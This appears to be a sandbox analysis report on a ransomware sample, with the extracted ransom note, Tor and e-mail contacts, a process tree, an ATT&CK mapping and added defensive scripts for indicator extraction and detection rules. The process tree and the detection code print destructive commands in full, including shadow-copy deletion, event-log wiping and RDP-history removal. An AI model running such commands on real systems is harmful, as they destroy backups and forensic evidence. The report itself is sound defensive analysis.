Analysis

  • max time kernel
    180s
  • max time network
    178s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 03:19

General

  • Target

    9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe

  • Size

    73KB

  • MD5

    1c021f42e3a138060e1d298726d1579f

  • SHA1

    54e3384fb68fde6fc711491e8072781e3910156a

  • SHA256

    9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c

  • SHA512

    5ee344d17b5e9a2285258b8e16253263ebb856167b36e7679e602c041c2320c10a7182a7cb5c14f59fe3117a981e96fdff6fa7dc2c2194e90a6f659de143c101

Score
10/10

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\How_to_recovery.txt

Ransom Note
ontact us for price and get decryption software. Note that this server is available via Tor browser only
Follow the instructions to open the link: qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion
1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.
2. Press "Download Tor", then press "Download Tor Browser Bundle", install and run it.
3. Now you have Tor browser. In the Tor Browser open qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion
4. Start a chat and follow the further instructions.
If you can not use the above link, use the email: ithelp02@decorous.cyou ithelp02@wholeness.business
* To contact us, create a new free email account on the site: protonmail.com
IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.
Emails

ithelp02@decorous.cyou

ithelp02@wholeness.business

URLs

http://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion
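
The contact indicators listed above are what an analyst pulls out of the note for blocklists and pivoting. The block below is an added example, not code from the sandbox report or from the sample: it extracts e-mail and .onion addresses from the note text and checks that each onion address is a well-formed Tor v3 address (56 base32 characters that decode to a 32-byte key, a 2-byte checksum and the version byte 3). The v3 layout and checksum rule are Tor's own, not something the report states; NOTE_EXCERPT is copied from the note as the report prints it, which starts mid-sentence there too.

```python
"""Extract and sanity-check the contact indicators in a ransom note.

Added example, not part of the sandbox report.  The Tor v3 address layout
(base32 of PUBKEY[32] || CHECKSUM[2] || VERSION[1]) and its checksum rule
(SHA3-256(".onion checksum" || PUBKEY || VERSION)[:2]) come from Tor's
rendezvous spec, not from the report.
"""
import base64
import hashlib
import re

# Excerpt of the note as the report prints it (it begins mid-sentence there).
NOTE_EXCERPT = (
    "ontact us for price and get decryption software. Note that this server is "
    "available via Tor browser only Follow the instructions to open the link: "
    "qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion 1. Type the "
    'addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. '
    "3. Now you have Tor browser. In the Tor Browser open "
    "qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion 4. Start a chat "
    "and follow the further instructions. If you can not use the above link, use the "
    "email: ithelp02@decorous.cyou ithelp02@wholeness.business * To contact us, create "
    "a new free email account on the site: protonmail.com"
)

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
# v3 onion labels are exactly 56 characters of the base32 alphabet a-z, 2-7.
ONION_RE = re.compile(r"\b[a-z2-7]{56}\.onion\b", re.I)


def extract_iocs(text):
    """Return e-mails and onion addresses in order of first appearance, de-duplicated."""
    emails = list(dict.fromkeys(m.group(0).lower() for m in EMAIL_RE.finditer(text)))
    onions = list(dict.fromkeys(m.group(0).lower() for m in ONION_RE.finditer(text)))
    return {"emails": emails, "onions": onions}


def check_onion_v3(addr):
    """Decode a v3 onion address and report its version byte and checksum status.

    A mangled extraction (truncated or mis-OCR'd address) fails the length or
    alphabet check; a structurally valid one decodes to 35 bytes, of which the
    last must be 3 and bytes 32..33 must equal the SHA3-256 based checksum.
    """
    label = addr.lower()
    if label.endswith(".onion"):
        label = label[:-len(".onion")]
    if not re.fullmatch(r"[a-z2-7]{56}", label):
        return {"valid": False, "reason": "not 56 base32 characters"}
    raw = base64.b32decode(label.upper())  # 56 chars * 5 bits = 35 bytes, no padding
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34]
    expected = hashlib.sha3_256(b".onion checksum" + pubkey + bytes([version])).digest()[:2]
    return {
        "valid": version == 3 and checksum == expected,
        "version": version,
        "checksum_ok": checksum == expected,
        "pubkey_hex": pubkey.hex(),
    }


if __name__ == "__main__":
    iocs = extract_iocs(NOTE_EXCERPT)
    print(iocs)
    for onion in iocs["onions"]:
        print(onion, check_onion_v3(onion))
```

Running it against the excerpt yields the two ithelp02 mailboxes and the single onion address from the Emails and URLs lists above; the version check is what separates a real v3 address from a line-wrapped or truncated one before it goes into a blocklist.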

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 38 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe
    "C:\Users\Admin\AppData\Local\Temp\9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:676
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1124
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe > nul
      2⤵
      • Deletes itself
      PID:916
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1736
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1480
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\How_to_recovery.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:1752
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:1932
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f4
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1864
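
The cmd.exe children in the tree above (PIDs 520, 216 and 916) carry the whole recovery-inhibition and cleanup routine on their command lines: vssadmin shadow deletion, wiping the Terminal Server Client history keys and Default.rdp, a for loop that clears every event log wevtutil can enumerate, and finally deletion of the sample's own image. The block below is an added example, not code from the report or from the sample: a handful of process-creation rules that would fire on those command lines, each tagged with an ATT&CK technique ID. The IDs for shadow deletion and file deletion are the v6 IDs the report's matrix uses; tagging the event-log and RDP-history wiping as T1070 (Indicator Removal on Host) is this example's own mapping, which the report does not list. SAMPLE_EVENTS is constructed from the command lines shown in the tree, with the field names (Image, CommandLine, ParentImage) borrowed from Sysmon event ID 1; the event layout itself is an assumption for illustration.

```python
"""Command-line detections for the behaviour in the process tree.

Added example, not code from the sandbox report or the sample.  Event field
names follow Sysmon event ID 1, but the dict layout is assumed for
illustration.  The cmd.exe separators between the individual commands were
lost when the report flattened the command line, so the rules do not rely
on them.
"""
import re

SAMPLE_EXE = (r"C:\Users\Admin\AppData\Local\Temp"
              r"\9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe")

# Command line of PIDs 520 and 216 as the report prints it.
WIPE_CMDLINE = (
    r'"C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet '
    r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f '
    r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f '
    r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" '
    r'cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp '
    "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\""
)
# Command line of PID 916 (self-deletion).
SELFDEL_CMDLINE = r'"C:\Windows\system32\cmd.exe" /c del ' + SAMPLE_EXE + " > nul"

# Constructed events: the two malicious ones from the tree plus three benign
# look-alikes (an admin listing shadows, an installer deleting a file that is
# not its parent, an analyst querying a log) to show what must not fire.
SAMPLE_EVENTS = [
    {"ProcessId": 520, "Image": r"C:\Windows\system32\cmd.exe",
     "ParentImage": SAMPLE_EXE, "CommandLine": WIPE_CMDLINE},
    {"ProcessId": 916, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": SAMPLE_EXE, "CommandLine": SELFDEL_CMDLINE},
    {"ProcessId": 4001, "Image": r"C:\Windows\system32\vssadmin.exe",
     "ParentImage": r"C:\Windows\system32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},
    {"ProcessId": 4002, "Image": r"C:\Windows\system32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" /c del C:\Tools\setup_tmp.exe > nul'},
    {"ProcessId": 4003, "Image": r"C:\Windows\system32\wevtutil.exe",
     "ParentImage": r"C:\Windows\system32\cmd.exe",
     "CommandLine": "wevtutil.exe qe Security /c:20 /f:text"},
]

# (rule name, pattern, ATT&CK technique).  T1490 and T1107 are the v6 IDs in the
# report's matrix; T1070 is this example's own mapping for the log/RDP wiping.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows\b.*?/all", re.I | re.S), "T1490"),
    ("event_log_wipe_loop",
     re.compile(r"wevtutil(?:\.exe)?\s+el\b.*?wevtutil(?:\.exe)?\s+cl\b", re.I | re.S), "T1070"),
    ("rdp_history_wipe",
     re.compile(r'reg\s+delete\s+"?HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client',
                re.I), "T1070"),
    ("default_rdp_deleted",
     re.compile(r"attrib\s+Default\.rdp\s+-s\s+-h.*?del\s+Default\.rdp", re.I | re.S), "T1070"),
    ("self_deletion",
     re.compile(r'\bdel\s+(?P<target>"[^"]+\.exe"|\S+\.exe)\s*>\s*nul', re.I), "T1107"),
]


def evaluate(event):
    """Return [(rule_name, technique_id)] for one process-creation event."""
    cmd = event.get("CommandLine", "")
    hits = []
    for name, pattern, technique in RULES:
        match = pattern.search(cmd)
        if match is None:
            continue
        if name == "self_deletion":
            # Deleting some .exe via cmd is routine; deleting the parent's own image is not.
            target = match.group("target").strip('"').lower()
            if target != event.get("ParentImage", "").lower():
                continue
        hits.append((name, technique))
    return hits


def triage(events):
    """Map ProcessId -> hits for every event that matched at least one rule."""
    result = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            result[event["ProcessId"]] = hits
    return result


def techniques(events):
    """Sorted, de-duplicated technique IDs observed across all events."""
    return sorted({tech for hits in triage(events).values() for _, tech in hits})


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits)
    print(techniques(SAMPLE_EVENTS))
```

On the constructed events only PIDs 520 and 916 fire; the self-deletion rule is gated on the deleted path matching the parent's image, which is what keeps an installer's cleanup of a temporary .exe out of the alert queue while still catching the sample deleting itself from the user's Temp directory.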

    Network

    MITRE ATT&CK Matrix (ATT&CK v6)

    Tactic             Technique                             ID      Count
    Persistence        Registry Run Keys / Startup Folder    T1060   1
    Defense Evasion    File Deletion                         T1107   2
    Defense Evasion    Modify Registry                       T1112   1
    Discovery          Query Registry                        T1012   1
    Discovery          Peripheral Device Discovery           T1120   1
    Discovery          System Information Discovery          T1082   2
    Impact             Inhibit System Recovery               T1490   2


    Downloads

    • C:\Users\Admin\Desktop\How_to_recovery.txt
      MD5

      dc25b9677563088c9f6b8101032b1ff6

      SHA1

      7309a759725bda70392eb77cb22d09b498361d57

      SHA256

      e86df8fff4ff879ed1399842a0357dd7baeb97c77226c7b70f564c259b3dbbf3

      SHA512

      9c31b323bdea16ab6374eb32542ebe0a9de79712e1a9cf08a341fe0dcdf4e4c43c3e12c70c78f94359d091d6b8eea832bd9cb415aae1860a26d969129f8b7da3

    • memory/1480-55-0x000007FEFB571000-0x000007FEFB573000-memory.dmp
      Filesize

      8KB

    • memory/1580-54-0x00000000754B1000-0x00000000754B3000-memory.dmp
      Filesize

      8KB